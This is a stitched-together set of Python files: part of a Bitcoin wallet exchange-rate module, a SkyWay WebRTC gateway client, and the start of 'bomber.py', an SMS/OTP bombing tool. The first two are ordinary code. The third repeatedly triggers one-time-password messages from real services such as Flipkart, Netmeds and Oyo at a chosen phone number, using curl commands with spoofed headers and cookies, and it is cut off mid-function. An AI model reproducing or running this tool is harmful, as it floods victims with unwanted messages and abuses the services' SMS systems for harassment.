json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price'] / 100.0)}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
class Zaif(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.zaif.jp', '/api/1/last_price/btc_jpy')
return {'JPY': Decimal(json['last_price'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
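# Example of dictinvert(): {'ExchangeA': ['USD', 'EUR'], 'ExchangeB': ['USD']}
# becomes {'USD': ['ExchangeA', 'ExchangeB'], 'EUR': ['ExchangeA']}.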
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
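    # Examples (illustrative only) of ccy_amount_str(), assuming self.ccy is set accordingly:
    #   JPY (precision 0):  ccy_amount_str(Decimal('1234.56'), True) -> '1,235'
    #   USD (default 2):    ccy_amount_str(Decimal('1234.56'), True) -> '1,234.56'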
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from electrum.util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
core.py
|
#!/usr/bin/env python
import requests, threading, time, json, sys, socket, random
from queue import Queue
class AsyncRequest(object):
def __init__(self, gateway_addr='127.0.0.1', gateway_port=8000):
self.gateway_addr = gateway_addr
self.gateway_port = gateway_port
self.base_url = 'http://' + gateway_addr + ':' + str(gateway_port)
self.onDict = {}
self.open = True
def _request_thread(self, uri, params={}, expected_code=200):
while self.open:
res = requests.get(uri, params=params) # http request (blocking)
json_dict = res.json()
event = json_dict.get('event')
# run callback by event
if res.status_code == expected_code and event is not None and self.onDict.get(event.lower()) is not None:
func = self.onDict.get(event.lower())
func(json_dict)
def async_get(self, uri, params={}, expected_code=200):
thread = threading.Thread(target=self._request_thread, args=(uri, params, expected_code))
thread.start()
def close(self):
self.open = False
def on(self, event, callback):
self.onDict[event] = callback
class Data(AsyncRequest):
def __init__(self, redirect_port, data_connection_id=None):
super().__init__()
self.connection_id = data_connection_id
self.redirect_addr = self.gateway_addr
self.redirect_port = redirect_port
self.queue = None
self.thread_run_data = True
# Open data port
res = requests.post(
self.base_url + '/data',
json.dumps({}),
headers={'Content-Type': 'application/json'}
)
if res.status_code == 201:
body_data = res.json()
self.id = body_data['data_id']
self.ipv4_addr = body_data['ip_v4']
self.port = body_data['port']
if self.connection_id is None:
# As "Data Connect"
# WIP.
res = requests.post(
self.base_url + '/data/connections',
json.dumps({
}),
headers={'Content-Type': 'application/json'}
)
pass
else:
# As "Data Answer"
self.async_get(self.base_url + '/data/connections/' + self.connection_id + '/events')
self.on('close', self.close) # fire when disconnected any connection
self._setRedirect()
else:
raise Exception('Gateway returns code '+str(res.status_code)+' on opening data port')
def close(self, event=None):
# Close async get thread (at super class)
super().close()
# Close udp listener thread (on here)
self.thread_run_data = False
# Free data_connection_id
if self.connection_id is not None and event is None:
res = requests.delete(self.base_url + '/data/connections/' + self.connection_id)
if res.status_code != 204:
raise Exception('Gateway returns code '+str(res.status_code)+' on closing data connection')
# Free data_id
if self.id is not None:
res = requests.delete(self.base_url + '/data/' + self.id)
if res.status_code != 204 and res.status_code != 404: # 404 is disconnection from another peer
raise Exception('Gateway returns code '+str(res.status_code)+' on closing data port')
def _setRedirect(self):
params = {
'feed_params': {'data_id': self.id},
'redirect_params': {'ip_v4': self.redirect_addr, 'port': self.redirect_port}
}
res = requests.put(
self.base_url + '/data/connections/' + self.connection_id,
json.dumps(params),
headers={'Content-Type': 'application/json'}
)
if res.status_code != 200:
raise Exception('Gateway returns code '+str(res.status_code)+' on setting redirection of data connection')
def _udp_receive_thread(self, queue):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.settimeout(0.5)
try:
udp.bind(('127.0.0.1', self.redirect_port))
        except OSError:
            # bind() raises OSError (e.g. address already in use), not socket.timeout
            pass
while self.thread_run_data:
try:
data = udp.recv(128)
except socket.timeout:
pass
else:
queue.put(data)
udp.close()
def getQueue(self):
if self.queue is None:
queue = Queue()
thread = threading.Thread(target=self._udp_receive_thread, args=([queue]), name='UDP-Listener-'+str(self.redirect_port))
thread.start()
self.queue = queue
return self.queue
def getStatus(self):
res = requests.get(self.base_url + '/data/connections/' + self.connection_id + '/status')
j = res.json()
if res.status_code == 200 and j.get('open') is True:
return True
else:
return False
def send(self, message):
if type(message) is not bytes:
message = str(message).encode()
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.sendto(message, (self.ipv4_addr, self.port))
udp.close()
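# Hypothetical usage sketch (not part of the gateway wrapper itself): echo every UDP payload
# received on an established Data connection back to the remote peer.
def _example_echo(data_connection, max_messages=10):
    inbox = data_connection.getQueue()    # starts the UDP listener thread on first use
    for _ in range(max_messages):
        payload = inbox.get()             # blocks until a datagram is redirected here
        data_connection.send(payload)     # relay it back through the gateway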
class Media(AsyncRequest):
def __init__(self, media_connection_id=None):
super().__init__()
self.id = ''
self.rtcp_id = ''
self.ipv4_addr = ''
self.port = 0
self.rtcp_port = 0
self.connection_id = media_connection_id
self._isHandledIncomingMedia = False
self._isHandledOutgoingMedia = False
# Open media port (RTCP)
res1 = requests.post(
self.base_url + '/media/rtcp',
json.dumps({}),
headers={'Content-Type': 'application/json'}
)
if res1.status_code == 201:
body_data = res1.json()
self.rtcp_id = body_data['rtcp_id']
self.rtcp_port = body_data['port']
# Open media port (RTP)
res2 = requests.post(
self.base_url + '/media',
json.dumps({'is_video': True}),
headers={'Content-Type': 'application/json'}
)
if res2.status_code == 201:
body_data = res2.json()
self.id = body_data['media_id']
self.ipv4_addr = body_data['ip_v4']
self.port = body_data['port']
if self.connection_id is None:
# As "Media Connect"
# WIP.
res3 = requests.post(
self.base_url + '/media/connections',
json.dumps({
}),
headers={'Content-Type': 'application/json'}
)
pass
else:
# As "Media Answer"
self.async_get(self.base_url + '/media/connections/' + self.connection_id + '/events')
self.on('close', self.close) # fire when disconnected any connection
else:
raise Exception('Gateway returns code '+str(res.status_code)+' on opening media port')
def close(self, event=None):
# Close async get thread (at super class)
super().close()
# Close udp listener thread (on here)
self.thread_run_media = False
# Free data_connection_id
if self.connection_id is not None and event is None:
res = requests.delete(self.base_url + '/media/connections/' + self.connection_id)
if res.status_code != 204:
raise Exception('Gateway returns code '+str(res.status_code)+' on closing media connection')
# Free media_id
if self.id is not None:
res = requests.delete(self.base_url + '/media/' + self.id)
if res.status_code != 204 and res.status_code != 404: # 404 is disconnection from another peer
raise Exception('Gateway returns code '+str(res.status_code)+' on closing media port')
# Free rtcp_id
if self.rtcp_id is not None:
            res = requests.delete(self.base_url + '/media/rtcp/' + self.rtcp_id)
if res.status_code != 204 and res.status_code != 404: # 404 is disconnection from another peer
raise Exception('Gateway returns code '+str(res.status_code)+' on closing rtcp port')
def getStatus(self):
res = requests.get(self.base_url + '/media/connections/' + self.connection_id + '/status')
j = res.json()
if res.status_code == 200 and j.get('open') is True:
return True
else:
return False
def isRedirectedIncoming(self):
return self._isHandledIncomingMedia
def isRedirectedOutgoing(self):
return self._isHandledOutgoingMedia
def getSinkToAnswer(self, set_redirect_ipv4_to_get_call=None, set_redirect_port_to_get_call=None):
constraints = {
'video': True,
'videoReceiveEnabled': False,
'video_params': {
'band_width': 1500,
'codec': 'VP8',
'media_id': self.id,
'rtcp_id': self.rtcp_id,
'payload_type': 96
},
'audio': False,
'audioReceiveEnabled': False
}
if set_redirect_ipv4_to_get_call is None or set_redirect_port_to_get_call is None:
self._isHandledIncomingMedia = False
redirection = {}
else:
self._isHandledIncomingMedia = True
constraints['videoReceiveEnabled'] = False
redirection = {
'video': {
'ip_v4': set_redirect_ipv4_to_get_call,
'port': set_redirect_port_to_get_call
}
}
res = requests.post(
self.base_url + '/media/connections/' + self.connection_id + '/answer',
json.dumps({
'constraints': constraints,
'redirect_params': redirection
}),
headers={'Content-Type': 'application/json'}
)
if res.status_code == 202:
# Accepted
self._isHandledOutgoingMedia = True
return self.id, self.ipv4_addr, self.port
else:
self._isHandledOutgoingMedia = False
return False, False, False
class Peer(AsyncRequest):
def __init__(self, peer_id, api_key, turn=False, dumpMessage=False):
super().__init__()
self.id = peer_id
self.token = None
self.dataInstances = []
self.mediaInstances = []
self.dump = dumpMessage
# Connect to SkyWay server
params = {'key': api_key, 'domain': 'localhost', 'turn': turn, 'peer_id': self.id}
res = requests.post(
self.base_url + '/peers',
json.dumps(params),
headers={'Content-Type': 'application/json'}
)
if res.status_code == 201:
body_data = res.json()
self.token = body_data['params']['token']
self.async_get(
self.base_url + '/peers/' + self.id + '/events',
{'token': self.token}
)
self.on('connection', self._createDataInstance) # fire when receive data connection
self.on('call', self._createMediaInstance) # fire when receive media connection
else:
raise Exception('Gateway returns code '+str(res.status_code)+' on creating peer')
def close(self):
# Close async get thread (at super class)
super().close()
# Free data instances
for data in self.dataInstances:
data.close()
# Free media instances
for media in self.mediaInstances:
media.close()
# Free peer_id
if self.token is not None:
res = requests.delete(
self.base_url + '/peers/' + self.id,
params={'token': self.token}
)
if res.status_code != 204:
raise Exception('Gateway returns code '+str(res.status_code)+' on closing peer')
def _getFreePort(self):
used_ports = []
for data in self.dataInstances:
used_ports.append(data.redirect_port)
while True:
redirect_port = random.randint(32768, 60999)
if redirect_port not in used_ports:
break
return redirect_port
def _printStatus(self):
print('Skygate: Peer has', len(self.mediaInstances), 'media connection(s) and', len(self.dataInstances), 'data connection(s)')
def _createDataInstance(self, response):
redirect_port = self._getFreePort()
# get connection_id from incoming packet and generate data instance
data_connection_id = response['data_params']['data_connection_id']
data = Data(redirect_port, data_connection_id)
self.dataInstances.append(data)
if self.dump:
print('Skygate: Established data connection', data_connection_id)
self._printStatus()
def _createMediaInstance(self, response):
media_connection_id = response['call_params']['media_connection_id']
media = Media(media_connection_id)
self.mediaInstances.append(media)
if self.dump:
print('Skygate: Established media connection', media_connection_id)
self._printStatus()
def getDataConnections(self):
for i, data in enumerate(self.dataInstances):
if not data.open:
dead = self.dataInstances.pop(i)
try:
dead.close()
if self.dump:
print('Skygate: Closed data connection', dead.connection_id)
self._printStatus()
except Exception as e:
print(e)
return self.dataInstances
def getMediaConnections(self):
for i, media in enumerate(self.mediaInstances):
if not media.open:
dead = self.mediaInstances.pop(i)
try:
dead.close()
if self.dump:
print('Skygate: Closed media connection', dead.connection_id)
self._printStatus()
except Exception as e:
print(e)
return self.mediaInstances
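# Hypothetical end-to-end sketch: it assumes a SkyWay WebRTC gateway running on localhost:8000;
# 'example-peer' and 'your-api-key' are placeholders, not real credentials.
if __name__ == '__main__':
    peer = Peer('example-peer', 'your-api-key', dumpMessage=True)
    try:
        while True:
            for data in peer.getDataConnections():
                inbox = data.getQueue()
                while not inbox.empty():
                    data.send(inbox.get())  # echo incoming datagrams back to the sender
            time.sleep(1)
    except KeyboardInterrupt:
        peer.close()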
|
bomber.py
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
import keyboard
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/YashkumarNavadiya/BombBIT
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
██████ ██ ██████ ████████ ████████
██▒▒▒██ ██ ██▒▒▒██ ▒▒▒██▒▒▒ ▒▒▒██▒▒▒
██ ██ ████ ██ ██ ██ ██ ██ ██ ██
██████▒ ██▒▒██ ███ ███ █████ ██████▒ ██ ██
██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██ ██▒▒▒██ ██ ██
██ ██ ██ ██ ██ ▒ ██ ██ ██ ██ ██ ██ ██
██████▒ ▒████▒ ██ ██ █████▒ ██████▒ ████████ ██
▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒ ▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, maxlim):
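    # Worker loop for "unlimited" mode: the proc.xxx lock file crudely serialises the
    # threads, and any API index that fails is dropped from ch so it is not retried.
    # The loop exits once count_inf exceeds maxlim.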
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
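    # res stays False when the request to Google succeeds; an exception flips it to True,
    # which is treated as "connection too slow or proxied" and aborts the run below.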
res = False
try:
requests.get('https://www.google.com', verify=True)
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tBombBIT Will Stop Now...\n\n')
banner()
exit()
def getapi(pn, lim, cc):
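    # pn: target number, lim: index of the API to try, cc: country code as a string.
    # The country_codes[cc] lookup below doubles as a sanity check: an unknown code
    # raises KeyError, which callers treat as a failed attempt. Returns True when the
    # request appears to have been accepted.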
global country_codes
cc = str(cc).strip()
cnn = country_codes[cc]
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
os.system('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno=' + pn + '&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')
return True
elif lim == 4:
os.system(
'curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"' + pn + '","country_code":"' + cc + '"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')
return True
elif lim == 5:
os.system('curl -s -X POST -H "Accept:*/*" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.5" -H "Connection:keep-alive" -H "Content-Length:34" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:www.oriyamatrimony.com" -H "Referer:https://www.oriyamatrimony.com/" -H "User-Agent:Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0" -H "X-Requested-With:XMLHttpRequest" -d "countrycode=' +
cc + '&mobileno=' + pn + '" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')
return True
elif lim == 6:
os.system(
'curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+' + cc + pn + '"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')
return True
elif lim == 7:
os.system('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+' + cc + pn + '&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')
return True
elif lim == 8:
